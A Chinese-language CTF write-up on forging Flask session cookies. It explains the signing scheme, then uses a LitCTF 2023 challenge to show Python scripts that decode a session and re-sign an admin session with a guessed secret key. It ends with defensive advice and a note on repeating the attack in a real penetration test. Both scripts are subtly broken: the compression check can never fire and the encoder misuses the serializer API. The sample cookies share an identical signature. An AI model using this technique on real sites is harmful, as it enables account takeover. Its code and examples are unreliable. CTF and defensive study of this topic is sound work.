Flask Session伪造实战：从零破解CTF赛题

1. Flask Session机制基础解析

HTTP协议本身是无状态的，这意味着服务器无法自动识别两次请求是否来自同一个用户。为了解决这个问题，Web开发中引入了Session机制。Flask作为轻量级Python Web框架，其Session实现方式颇具特色。

Flask的Session默认采用客户端存储方案，这与传统服务端存储有本质区别。当用户首次访问时，Flask会将用户状态信息序列化后存储在Cookie中，这个过程中包含三个关键环节：

1. 数据序列化：使用JSON格式存储用户状态
2. 压缩处理：对较大数据自动进行zlib压缩
3. 签名保护：通过secret_key生成HMAC签名

典型的Flask Session值形如：

eyJuYW1lIjoiYWRtaW4ifQ.ZGs1vw.7ikpuOhUtXxyB2UV-FH7UGIZkaE

这段字符串由三部分组成，用点号分隔：

• 第一部分是Base64编码的Session数据
• 第二部分是时间戳
• 第三部分是防篡改签名

2. Session伪造漏洞原理剖析

Flask的Session安全完全依赖于secret_key的保密性。如果攻击者获取到这个密钥，就能伪造任意用户的Session。这种攻击之所以有效，主要因为：

1. 签名验证机制缺陷：Flask仅验证数据完整性，不验证来源
2. 客户端存储风险：Session数据完全暴露在客户端
3. 密钥管理问题：开发者常使用弱密钥或泄露密钥

我曾在一个CTF比赛中遇到这样的场景：题目要求以管理员身份获取flag，但登录表单只允许普通用户登录。通过检查Cookie发现Flask Session后，我使用以下步骤成功伪造管理员身份：

1. 解码现有Session获取数据结构
2. 猜测或获取secret_key（常用CTF技巧：尝试比赛名称作为密钥）
3. 构造{"name":"admin"}的Session数据
4. 用正确密钥重新签名生成新Cookie

3. 实战破解CTF赛题

以LitCTF 2023的题目为例，演示完整攻击流程：

首先访问网站，随意输入用户名登录，通过浏览器开发者工具获取Session值：

eyJuYW1lIjoiZ3Vlc3QifQ.ZGs1vw.7ikpuOhUtXxyB2UV-FH7UGIZkaE

使用Python脚本解码：

from flask.sessions import SecureCookieSessionInterface from itsdangerous import base64_decode import zlib def decode_flask_cookie(cookie): try: compressed = False payload = cookie.split('.')[0] if payload.startswith('.'): compressed = True payload = payload[1:] data = base64_decode(payload) if compressed: data = zlib.decompress(data) return data.decode('utf-8') except Exception as e: return f"解码失败: {str(e)}" print(decode_flask_cookie("eyJuYW1lIjoiZ3Vlc3QifQ"))

输出显示当前用户名为guest。接下来需要伪造管理员Session，关键是要获取secret_key。在CTF环境中，常用技巧包括：

1. 尝试默认密钥（如flask、secret等）
2. 使用比赛名称（如LitCTF）
3. 通过文件读取漏洞获取配置文件

假设我们已确定secret_key为"LitCTF"，使用以下脚本生成管理员Session：

from flask.sessions import SecureCookieSessionInterface from itsdangerous import URLSafeTimedSerializer class MockApp: def __init__(self, secret_key): self.secret_key = secret_key def encode_flask_cookie(secret_key, data): app = MockApp(secret_key) serializer = URLSafeTimedSerializer( app.secret_key, salt='cookie-session', serializer=SecureCookieSessionInterface().get_signing_serializer(app) ) return serializer.dumps(data) admin_session = encode_flask_cookie("LitCTF", {"name":"admin"}) print("伪造的Session:", admin_session)

将生成的Session值替换浏览器Cookie，刷新页面即可获得管理员权限。

4. 防御措施与最佳实践

作为开发者，防范Session伪造需要多层次的防护：

1. 密钥管理：

   • 使用强随机生成的secret_key（至少32字符）
   • 禁止将密钥硬编码在代码中
   • 通过环境变量配置密钥

2. Session配置：

   • 考虑使用服务端Session存储（Redis等）
   • 设置合理的Session过期时间
   • 启用secure和httponly Cookie属性

3. 安全审计：

   • 定期轮换secret_key
   • 监控异常Session活动
   • 禁用调试模式生产环境

对于CTF选手，理解这些防御措施也能帮助更快发现漏洞。比如遇到Flask应用时，可以检查：

• 是否使用默认/弱密钥
• 配置文件是否可被读取
• 是否存在文件包含漏洞

在一次真实渗透测试中，我发现目标网站使用Flask框架，通过信息泄露漏洞获取到配置文件中的secret_key，最终成功实现了Session伪造。这再次证明了密钥保护的重要性。